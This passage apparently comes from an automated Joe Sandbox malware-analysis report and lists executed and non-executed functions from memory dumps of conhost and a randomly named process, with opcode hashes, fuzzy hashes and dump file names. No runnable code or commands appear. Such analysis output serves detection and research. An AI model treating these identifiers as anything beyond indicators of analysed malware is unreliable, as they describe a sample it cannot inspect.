                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Function 00007FFD343D171D Relevance: .0, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b0d609691cd0a67a7c1961c09a52ae71e5414ef4628c005c67fd8c3d1f11f7cd
                                                                                    • Instruction ID: 339c79a08c5faabb40d059207679bf155c41ebac141dff55519cc12ee3c3a66b
                                                                                    • Opcode Fuzzy Hash: b0d609691cd0a67a7c1961c09a52ae71e5414ef4628c005c67fd8c3d1f11f7cd
                                                                                    • Instruction Fuzzy Hash: E8F09632F495164BFB68FA08C8A56EC33A6EB92310F054676D40EC73D6DE2DAD4287C1
                                                                                    Function 00007FFD343E42CD Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6aa66d17187e342f2e5ec197a396205a8fbbc582ebdce762d483e0bd32156645
                                                                                    • Instruction ID: 416634f6f91798f7d8973e7e8c7c9591c5eb01d16092e96af3bcbb10056e4c01
                                                                                    • Opcode Fuzzy Hash: 6aa66d17187e342f2e5ec197a396205a8fbbc582ebdce762d483e0bd32156645
                                                                                    • Instruction Fuzzy Hash: A4F0A432F4951E8FEB58EB44C8A58BE73A1FB69310F04063AC11AD7390DF7869408740
                                                                                    Function 00007FFD343D0C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction ID: 220322e8e1aa441e93854d38f7731614a4ebb86235473affcf0ae8e436dd0677
                                                                                    • Opcode Fuzzy Hash: a8829bf4592e40ae3b4fada442c1efe27b7aec2c3418eee2fc3db957c814b10c
                                                                                    • Instruction Fuzzy Hash: B9018F34A0E3888FE712EB6484941DDBFF0AF03308F1441EAC580DB192D9395A48C741
                                                                                    Function 00007FFD343D0B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Function 00007FFD343E5518 Relevance: .0, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction ID: 4640bb846717c77e64037ae798f4c740fb56b9dcadbfe4fc94d7acd97375bf17
                                                                                    • Opcode Fuzzy Hash: 5fb093ff02a71e26105fccf7503ed6f1ae4011e19121ff59a0269e74ada4076c
                                                                                    • Instruction Fuzzy Hash: B5D05E30B609094B8B0CB62D8458430F3D1E7AA6067945278D44BC3285ED2AECC68B80
                                                                                    Function 00007FFD343D4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Function 00007FFD343E3E90 Relevance: .0, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                    Function 00007FFD343E4BD7 Relevance: .0, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343e0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction ID: 07d9137669ff819bbfef3455231f0d6bd9c63b4847d5cabdd0a3aaa4c5b20c5f
                                                                                    • Opcode Fuzzy Hash: 18652c7a7e1e5c6faaa405073d46f2ae8ec14b86f43d5acdc76515fa78c7179a
                                                                                    • Instruction Fuzzy Hash: B0D05B21B4D91747E645FA045CE077B2161EF19300F140074D64FC31C2CD3CE8427601
                                                                                    Function 00007FFD343D06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3048f9248019bea7b6f186f8c5423cf2b2eab0437b84f9e769dd21ee3450d732
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 16C08C00FCB58B00B400316E18E60ECA120DBC7A28FD00032D30CD20959C3F20C5214A
                                                                                    Function 00007FFD343D12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: f2c7580b359e954caa7700577bdda0318b4c9fe2d3013718838c153da6db0bf5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 3DC04C345558098FC948FB2DC99591477A0FB1A215BD50190E409C7171D66ADCD5D741
                                                                                    Function 00007FFD343D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: 735aa1df858eb5aeddf2c33aa0c7ee299a1304de0fead9086c4a11b781a4167b
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 26B01200DD748F00A40431BA08D60A47050AB47104FC00070D60CC1089987F10942242

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD343D09B0 Relevance: 5.2, Strings: 4, Instructions: 191COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000019.00000002.3367655933.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_25_2_7ffd343d0000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 86621e1fde3edf3ffc71cc49db4154185685da0f32ebebede09d868d991338ff
                                                                                    • Instruction ID: ea701b244c41a3dadb844275df2aec8f17d56ebb99556ec92d02f40348e8dd15
                                                                                    • Opcode Fuzzy Hash: 86621e1fde3edf3ffc71cc49db4154185685da0f32ebebede09d868d991338ff
                                                                                    • Instruction Fuzzy Hash: 0151A007B0E56345E32233FD70611EE6BA8DF8233AB584677E24CDB0834D1A65C682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD343D0D48 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5[_H
                                                                                    • API String ID: 0-3279724263
                                                                                    • Opcode ID: 84f8e1e489ea80a5e6f4ba2929fe7a68683e865fa107d55f6c38aac8d2b916d7
                                                                                    • Instruction ID: 636c5292bbd67fc4965f721511b205b117acf5c4c156919ad9a903d289bddb5d
                                                                                    • Opcode Fuzzy Hash: 84f8e1e489ea80a5e6f4ba2929fe7a68683e865fa107d55f6c38aac8d2b916d7
                                                                                    • Instruction Fuzzy Hash: EA91C175A19A898FE79AEF6888657E97FE1FB96310F1400BFC049D72D2CBBD18119700
                                                                                    Function 00007FFD343D08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: a9c9ed92a38fb08d9a992d9fdcb6ff7db80f74a43dd9a2ac5bbe9c0349228ec1
                                                                                    • Instruction ID: ae912eb42a21188c477916bfe81e27bc987bae56fe855acb03d9339ac57421d0
                                                                                    • Opcode Fuzzy Hash: a9c9ed92a38fb08d9a992d9fdcb6ff7db80f74a43dd9a2ac5bbe9c0349228ec1
                                                                                    • Instruction Fuzzy Hash: FF415A12B4E5951EE716B3BC60BA6F97BA4DF8A335B1804BFD14DC71D3CE2D68818280
                                                                                    Function 00007FFD343D0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: 235b3f400bae17ceb06da921df26a2ed21371765ad1cd2cf41d2efb5ab4194e2
                                                                                    • Instruction ID: cc2efae055264874791950a646308e30386fa309799706d67f5f57217ad6be93
                                                                                    • Opcode Fuzzy Hash: 235b3f400bae17ceb06da921df26a2ed21371765ad1cd2cf41d2efb5ab4194e2
                                                                                    • Instruction Fuzzy Hash: 24312521B1E9591BE755B3AC64AA6F973D5DF4A321F1444BEE40EC31D3CD2EAC818284
                                                                                    Function 00007FFD343D0998 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7H4
                                                                                    • API String ID: 0-2096274016
                                                                                    • Opcode ID: a2e7b3dc5c0a3aaf8b635a144bae951a8cfe570f44626667fd25fd7676e1a51d
                                                                                    • Instruction ID: 3835de77ec9da1daceffd9c064117b1419af5058f94baca62a5bdae39b00705e
                                                                                    • Opcode Fuzzy Hash: a2e7b3dc5c0a3aaf8b635a144bae951a8cfe570f44626667fd25fd7676e1a51d
                                                                                    • Instruction Fuzzy Hash: 4A214620B199590FE748F76884AA6B977C6EB8A311F1404BDE40EC32D7CE29AC418240
                                                                                    Function 00007FFD343D1171 Relevance: .1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 98f0253f97c3c475e453b9d9aae734fb05511a489b1fb12cd79b28ff0f61b967
                                                                                    • Instruction ID: 791b2a97b5e9cfa392a4538bb73b7aa17b0702b9c0afc09afb5487f34d2acfa4
                                                                                    • Opcode Fuzzy Hash: 98f0253f97c3c475e453b9d9aae734fb05511a489b1fb12cd79b28ff0f61b967
                                                                                    • Instruction Fuzzy Hash: 8331A131A0D68A8FDF46EB64C8A59A97BF0FF5B300B0805BBC009D71A3DA3DA845C751
                                                                                    Function 00007FFD343D0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction ID: 24eda12cd9a6022ea02aa2f8bf9272e9b29073fb4f36e0cb2ed3e6b450d99e4f
                                                                                    • Opcode Fuzzy Hash: df00a4066b643880c2d59f1cc06834a4a3d84e103eada8c39de2040a8cccdad3
                                                                                    • Instruction Fuzzy Hash: 21210135B0E2898FE712EB2888A51DC7FB0EF83329F1445B7C280DF192D5391A4AA741
                                                                                    Function 00007FFD343D0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction ID: 3f96e98a21404424cbaacd5540ac77989398d89523c784de7e1146948ce8a7b1
                                                                                    • Opcode Fuzzy Hash: feb6da0effec433ac78246fa435cad5f14201ff76e807aeacd30111fc7347779
                                                                                    • Instruction Fuzzy Hash: D111CE35B0E7888FE702EB2898A42DD7FB0EF83319F1544B7C284DF292D5391A499780
                                                                                    Function 00007FFD343D5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction ID: 9baded12b1604edbc2eb12ceec086a47201f661f8c663b4e58f9a3816c87e6f6
                                                                                    • Opcode Fuzzy Hash: 1367fdd2635cb4d8773ceb5b7bac313d56898e9429c9d2f2352ac406217a34ce
                                                                                    • Instruction Fuzzy Hash: CE012120E9D91D4AE7A5B61888B57BC61A1EF4B700F5001B5D91DE3292ED3E6D44A740
                                                                                    Function 00007FFD343D171D Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 32cc26ac7d26490d6a873e49993fc1b7f582473f654ca0ad25baf7336c2e8198
                                                                                    • Instruction ID: 73229dd71ac1b1823f111a5d09453ab89df22a2dbace0ff77a91e58737df99f6
                                                                                    • Opcode Fuzzy Hash: 32cc26ac7d26490d6a873e49993fc1b7f582473f654ca0ad25baf7336c2e8198
                                                                                    • Instruction Fuzzy Hash: A6F0C822F4D4074BFB58B604C4A56E83391EB92310F044676D40DC72D6DE6DAD4283C0
                                                                                    Function 00007FFD343D5F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 7dddf225c71f9e7a0ec9b22fc1032d6338144fc44058bdbccf12c89b7a2c25cf
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 57016D30A9D40E8AEBA8BA04D8A5BF872A5EF16300F5001B9D90ED31A1EE3D29C55A41
                                                                                    Function 00007FFD343D0C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction ID: b138bdf6ada42a5344b5108d1015447a0bf97a31047aad3af935477e2d8f3502
                                                                                    • Opcode Fuzzy Hash: 8fde1c70c65ee5f2c51e3bfbdebf05f195a66c6b070661791eb3dbd4f6e18495
                                                                                    • Instruction Fuzzy Hash: C5015E35A0E7888FD712EB68C8941DDBFB0AF43314F1545EAC580DB1A2D5395A48D781
                                                                                    Function 00007FFD343D0B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction ID: 1024ff713126171387a3fc8aeef8a02c854a77d489bb69c09cd9b6fa1afbf811
                                                                                    • Opcode Fuzzy Hash: e755c29a42b3ce14799ff74ec821416fd7e1b032b190bc4a9802ed2d1bd81a7d
                                                                                    • Instruction Fuzzy Hash: 01E07D3232D94E4FDF02FB3CDC974A83B50EB8B21078700FAD108CB0A2C212684E8B01
                                                                                    Function 00007FFD343D4265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: c3574f17ea6472ccfd9d5795fce2fde2abe249d1d78e15150e0c03fe877680af
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: 97E01A70F4911A4BFBA8B248D8E13F96264EF8A304F145078DB6ED33C5DD3DAD409605
                                                                                    Function 00007FFD343D06AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: 3048f9248019bea7b6f186f8c5423cf2b2eab0437b84f9e769dd21ee3450d732
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 16C08C00FCB58B00B400316E18E60ECA120DBC7A28FD00032D30CD20959C3F20C5214A
                                                                                    Function 00007FFD343D12D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: f2c7580b359e954caa7700577bdda0318b4c9fe2d3013718838c153da6db0bf5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: 3DC04C345558098FC948FB2DC99591477A0FB1A215BD50190E409C7171D66ADCD5D741
                                                                                    Function 00007FFD343D06D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001A.00000002.3454512751.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_26_2_7ffd343d0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: 735aa1df858eb5aeddf2c33aa0c7ee299a1304de0fead9086c4a11b781a4167b
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 26B01200DD748F00A40431BA08D60A47050AB47104FC00070D60CC1089987F10942242